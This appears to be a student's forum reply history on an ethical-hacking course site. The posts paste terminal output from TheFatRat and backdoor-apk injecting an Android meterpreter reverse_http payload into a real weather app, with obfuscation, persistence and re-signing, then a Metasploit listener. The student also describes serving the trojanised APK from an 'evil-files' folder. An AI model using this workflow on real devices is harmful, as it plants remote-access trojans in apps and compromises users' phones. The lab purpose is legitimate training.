Forum Replies Created
- Posts
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.100.238 netmask 255.255.255.0 broadcast 192.168.100.255
inet6 fe80::20c:29ff:fe7e:b94e prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:7e:b9:4e txqueuelen 1000 (Ethernet)
RX packets 4825 bytes 2941520 (2.8 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 5780 bytes 891394 (870.5 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 1004 bytes 106816 (104.3 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1004 bytes 106816 (104.3 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500
inet 10.8.0.2 netmask 255.255.0.0 destination 10.8.0.2
inet6 fdda:d0d0:cafe:1194::1000 prefixlen 64 scopeid 0x0<global>
inet6 fe80::44b1:5bb1:12d2:e76e prefixlen 64 scopeid 0x20<link>
unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 500 (UNSPEC)
RX packets 3229 bytes 1507100 (1.4 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 4378 bytes 445050 (434.6 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 2312
inet 192.168.100.106 netmask 255.255.255.0 broadcast 192.168.100.255
inet6 fe80::7bae:4f96:fdb:22b9 prefixlen 64 scopeid 0x20<link>
ether 00:13:ef:f4:00:60 txqueuelen 1000 (Ethernet)
RX packets 292 bytes 173648 (169.5 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 18 bytes 2738 (2.6 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0oot@kali:~# route -n
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
0.0.0.0 10.8.0.1 128.0.0.0 UG 0 0 0 tun0
0.0.0.0 192.168.100.1 0.0.0.0 UG 100 0 0 eth0
0.0.0.0 192.168.100.1 0.0.0.0 UG 600 0 0 wlan0
10.8.0.0 0.0.0.0 255.255.0.0 U 0 0 0 tun0
128.0.0.0 10.8.0.1 128.0.0.0 UG 0 0 0 tun0
185.213.154.134 192.168.100.1 255.255.255.255 UGH 0 0 0 eth0
192.168.100.0 0.0.0.0 255.255.255.0 U 100 0 0 eth0
192.168.100.0 0.0.0.0 255.255.255.0 U 600 0 0 wlan0
root@kali:~#IP device: 192.168.100.129
[ ]===========================================================================[ ]
[ ] [ ]
[ ] ) ( ) ) ( ( ) [ ]
[ ] ( ( ( ( /( )\ ) ( /( ( /( )\ ) )\ ) ( /( ( [ ]
[ ] )\ )\ )\ )\())(()/( )\()) )\()) (()/((()/( )\()) )\ ) [ ]
[ ] ((_)((((_)( (((_) |((_)\ /(_)) ((_)\ ((_)\ /(_))/(_))((_)\ (()/( [ ]
[ ] (_) )\_ )\ )\___ |_ ((_)(_))_ ((_) ((_) (_)) (_)) _((_) /(_))_ [ ]
[ ] | _ ) (_)_\(_)((/ __|| |/ / | \ / _ \ / _ \ | _ \|_ _| | \| |(_)) __|[ ]
[ ] | _ \ / _ \ | (__ ‘ < | |) || (_) || (_) || / | | | .` | | (_ |[ ]
[ ] |___/ /_/ \_\ \___| _|\_\ |___/ \___/ \___/ |_|_\|___| |_|\_| \___|[ ]
[ ]===========================================================================[ ]
[ ] Embed a Metasploit Payload in an original .apk files [ ]
[ ] This script is POC for injecting metasploit payload arbitary apk backdoor [ ]
[ ]===========================================================================[ ]Cleaning Temp files
Done!Your local IPV4 address is : 192.168.100.106
Your local IPV6 address is : fe80::7bae:4f96:fdb:22b9
Your public IP address is :
Your Hostname is :Set LHOST IP: 192.168.100.106
Set LPORT: 8080
Enter the path to your android app/game .(ex: /root/downloads/myapp.apk)
Path : /root/Downloads/buienradar.apk
Testing your apk before next step …
+——————————————-+
| [ 1 ] android/meterpreter/reverse_http |
| [ 2 ] android/meterpreter/reverse_https |
| [ 3 ] android/meterpreter/reverse_tcp |
| [ 4 ] android/shell/reverse_http |
| [ 5 ] android/shell/reverse_https |
| [ 6 ] android/shell/reverse_tcp |
+——————————————-+Choose Payload : 1
[ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]
+————————————-+
| [ 1 ] Use Backdoor-apk 0.2.4a |
| [ 2 ] Use old Fatrat method |
| [ 3 ] Use MsfVenom Embedded method |
+————————————-+Select Tool to create apk : 1
[ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]$
Generate Backdoor
+————++————————-++———————–+
| Name || Descript || Your Input
+————++————————-++———————–+
| LHOST || The Listen Addres || 192.168.100.106
| LPORT || The Listen Ports || 8080
| OUTPUTNAME || The Filename output || app_backdoor.apk
| PAYLOAD || Payload To Be Used || android/meterpreter/reverse_http
+————++————————-++———————–+________
/ ______ \
|| _ _ ||
||| || ||| AAAAAA PPPPPPP KKK KKK
|||_||_||| AAA AAA PPP PPP KKK KKK
|| _ _o|| (o) AAA AAA PPP PPP KKKKKK
||| || ||| AAAAAAAA PPPPPPPP KKK KKK
|||_||_||| AAA AAA PPP KKK KKK
||______|| AAA AAA PPP KKK KKK
/__________\
________|__________|__________________________________________
/____________\
|____________| Dana James Traversie[*] Running backdoor-apk.sh v0.2.4a on Thu Jul 6 07:29:27 AM EDT 2023
[+] Android manifest permission options:
1) Keep original
2) Merge with payload and shuffle
[?] Please select an Android manifest permission option: 2
[*] Decompiling original APK file…done.
[*] Locating smali file to hook in original project…done.
[+] Package where RAT smali files will be injected: com/supportware/Buienradar
[+] Smali file to hook RAT payload: nl/rtl/buienradar/BuienradarApplication.smali
[*] Generating RAT APK file…done.
[*] Decompiling RAT APK file…done.
[*] Merging permissions of original and payload projects…done.
[*] Injecting helpful Java classes in RAT APK file…done.
[*] Creating new directory in original package for RAT smali files…done.
[+] Inject package path: com/supportware/Buienradar/anvzv
[+] Generated new smali class name for MainBroadcastReceiver.smali: Xoodj
[+] Generated new smali class name for MainService.smali: Omede
[+] Generated new smali class name for Payload.smali: Xiqlw
[+] Generated new smali class name for StringObfuscator.smali: Mvtrc
[+] Generated new smali method name for StringObfuscator.obfuscate method: ludhu
[+] Generated new smali method name for StringObfuscator.unobfuscate method: wgycs
[*] Copying RAT smali files to new directories in original project…done.
[*] Fixing RAT smali files…done.
[*] Obfuscating const-string values in RAT smali files…Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
done.
[*] Adding hook in original smali file…done.
[*] Adding persistence hook in original project…done.
[*] Recompiling original project with backdoor…done.
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=trueWarning:
The certificate uses the SHA1withRSA signature algorithm which is considered a security risk. This algorithm will be disabled in a future update.
The certificate uses a 1024-bit RSA key which is considered a security risk. This key size will be disabled in a future update.
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=trueWarning:
The certificate uses the SHA1withRSA signature algorithm which is considered a security risk. This algorithm will be disabled in a future update.
The certificate uses a 1024-bit RSA key which is considered a security risk. This key size will be disabled in a future update.
[*] Generating RSA key for signing…done.
[*] Signing recompiled APK…done.
[*] Verifying signed artifacts…done.
[*] Aligning recompiled APK…done.[*] Backdoor apk created succefully
Your RAT apk was successfully builded and signed , it is located here :
~/Fatrat_Generated/app_backdoor.apkDo you want to create a listener for this configuration
to use in msfconsole in future ?Choose y/n :
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
—- ————— ——– ———–Payload options (android/meterpreter/reverse_http):
Name Current Setting Required Description
—- ————— ——– ———–
LHOST 192.168.100.106 yes The local listener hostname
LPORT 8080 yes The local listener port
LURI no The HTTP PathExploit target:
Id Name
— —-
0 Wildcard Targetmsf6 exploit(multi/handler) >
Hello Diego,
I did what you said, used the wlan0 ip adress to create the apk. but still didnt get a meterpreter session. i also tried lport 4444, but without result.
Any ideas what i could do different?
ThanksHello Diego,
Why do i need to use a wireless adapter? The course says nothing about a wireless adapter.
Here the course tells you to create a malicious apkfile and then place it in your evil-files on your apache server.
And downloading it with a android device that is connected to the same network. I have a wireless adapter if needed.
Im failing to get the meterpreter session.Hey Diego,
Here is the screenshot, but also i tried a different application instead the flappy bird from the course. When i used angry birds it completed the apk succesfully. And i follow all the following steps. Moving it to my /var/www/html/evil-files/ and setting up a new listener on metasploit. Using exploit/multi/handler/, Setting payload /android/meterpreter/reverse_http (tried tcp as well) setting lhost to my ip adress and setting lport 8080 (tried 4444 also).
Then exploit to listen to new incoming agents
Running apache2 and using an android phone to download the application. Which all goes without issues, i download and install the application from the apache server but i dont get the meterpreter session. What am i missing?Hey Diego,
There were a few updates that popped up for vmware. I dont have firewall installed, i do have nextdns set up.
Other than than havent upgraded or installed anything.Hey Diego,
I ran the commands but it comes back with an error message.
Let me know what i can do, Thanks
Hello Diego,
Sorry i sent you the wrong screenshot. I installed empire according the course with command apt install powershell-empire
After a succesfull installation i ran powershell-empire server, and i get this error message.Hey Diego,
I didnt explain myself well. I followed the course, i ran apt install powershell-empire. Installation gives no errors. Only when running powershell-empire server, it gives the error (screenshot from previous message)
The installation using git clone i wrote is what i tried after that, sorry for not being clear.
Any idea what the issue might be?Hey Diego,
I installed mingw-w64. But the issue was that during the installation of FatRat it gave notification that the incorrect version of mingw was installed and if i wish to install the correct one, i entered yes every time. But it would fail everytime. But when enter no it succeeds.
Thanks as always 🙂
And this is the message when it finishes the installation. Im running this version Kali 2022 x64 Customized by zSecurity 1.0.12.vmwarevm.7z – 2.9 GB
What could be the issue?
ThanksHello,
I used used the payload go/meterpreter/rev_http.py
And indeed when i test the backdoor on its own i run into the same issue. It gives a message saying that whitoud database connected the payload will not work….
I have send you a screenshot.
Thank youHello Diego, Yes i downloaded the kali image from the link here on zsecurity. I havent ran upgrade. I completely installed a new operating system, Ubuntu and new vmware and kali but had the same issue. I found a solution from vmware website. To put in bridged mode and go to terminal and press enter, and indeed directly you get a wired connection and everything runs. Only nat mode does not… I do not use a firewall but i do use a private dns server, nextdns. But also when i disable nextdns the issue remains.. Is it possible that the instalation of nextdns messes something up to be able to use nat mode… otherwise im running out of ideas.
Let me know if you have any suggestions. thank you
